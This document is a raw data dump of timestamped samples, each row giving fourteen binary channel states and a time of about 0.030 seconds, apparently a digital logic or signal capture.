0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082468e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082496e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082520e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082572e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082596e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082620e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082644e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082668e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082696e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082720e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082772e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082796e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082820e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082868e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082896e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082920e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0082972e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0082996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0083020e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0083044e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0083068e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0083096e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0083124e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0083148e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0083172e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0083196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0083220e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0083244e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0083268e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0083276e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0207108e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0207300e-02 1,0,1,0,1,1,0,0,0,1,0,1,0,1,3.0207328e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0207356e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.0207644e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0207668e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.0207692e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0207716e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.0207744e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0207768e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.0207796e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0207820e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.0207844e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0207868e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.0207892e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.0207916e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,3.0207924e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0207940e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0207944e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0207968e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0207996e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208020e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208024e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208044e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208068e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208092e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208116e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208144e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208168e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208196e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208220e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208244e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208268e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208276e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0208292e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208316e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0208344e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208368e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208372e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208396e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208420e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208444e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208468e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208492e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208516e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208544e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208568e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,3.0208572e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208576e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0208596e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208620e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0208644e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208668e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208676e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208692e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208716e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208724e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0208744e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208768e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0208796e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208820e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0208844e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208868e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0208892e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208916e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208924e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0208944e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0208968e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0208976e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0208996e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209020e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209044e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209068e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209092e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209116e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209124e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0209144e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209168e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0209196e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209220e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0209244e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209268e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209276e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209292e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209316e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209344e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209368e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209396e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209420e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209424e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0209444e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209468e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0209492e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209516e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0209544e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209568e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0209596e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209620e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209628e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209644e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209668e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209692e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209716e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209724e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0209744e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209768e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209776e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209796e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209820e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209844e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209868e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209892e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209916e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0209944e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0209968e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0209972e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0209996e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0210020e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210028e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210044e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210068e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210120e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210144e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210196e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210220e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210268e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210292e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210344e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210372e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210420e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210444e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210492e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210520e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210544e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210568e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210596e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210620e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0210624e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0210644e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0210668e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0210692e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0210716e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0210744e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0210768e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0210796e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0210820e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0210844e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0210868e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210876e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210892e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210916e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0210944e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0210968e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0210972e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0210996e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0211020e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0211044e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0211068e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0211092e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0211116e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0211144e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0211168e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,3.0211172e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211176e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211196e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211220e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211244e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211268e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211292e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211316e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211344e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211368e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0211372e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0211396e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0211420e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0211444e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0211468e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0211492e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0211516e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211524e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211544e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211568e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211596e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211620e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211668e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211692e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211744e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211772e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211820e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211844e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211892e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211920e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0211972e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0211996e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0212044e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212068e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0212092e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212116e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0212144e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212168e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0212172e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0212196e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0212220e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0212244e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0212268e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0212292e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0212316e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0212344e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0212368e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212376e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0212396e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212420e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0212444e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212468e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0212492e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212516e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0212524e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0212544e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0212568e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0212596e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0212616e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0212644e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0212668e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.0212692e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.0212716e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212724e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0212740e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212764e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0212792e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212816e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0212868e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212892e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0212940e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0212964e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213016e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213044e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213092e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213116e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213164e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213192e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213244e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213268e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213292e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213316e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213340e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213364e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213392e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213416e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213444e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213468e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213492e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213516e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213540e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213564e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213592e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213616e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213644e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213668e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213692e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213716e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213740e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213764e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213792e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213816e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213844e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213868e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213892e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213916e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213940e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0213964e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0213992e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0214016e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0214044e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0214068e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0214092e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0214116e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0214140e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0214164e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0214192e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0214216e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0214244e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0214268e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0214292e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0214316e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0214344e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0214368e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0214396e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0214420e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.0214444e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.0214468e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,3.0339012e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.0339180e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0339204e-02 0,1,1,0,1,0,0,0,0,0,0,1,0,1,3.0339220e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0339244e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0339540e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0339564e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0339592e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0339616e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0339644e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0339668e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0339692e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0339716e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0339740e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0339764e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0339792e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0339816e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0339844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0339868e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0339892e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0339916e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0339940e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0339964e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0339992e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340016e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340044e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340068e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340092e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340116e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340140e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340164e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340192e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340216e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340244e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340268e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340292e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340316e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340340e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340364e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340392e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340416e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340444e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340468e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340492e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340516e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340540e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340564e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340592e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340616e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340644e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340668e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340692e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340716e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340740e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340764e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340792e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340816e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340868e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340892e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340916e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340940e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0340964e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0340992e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341020e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341044e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341068e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341092e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341120e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341144e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341220e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341244e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341268e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341292e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341320e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341344e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341368e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341396e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341420e-02 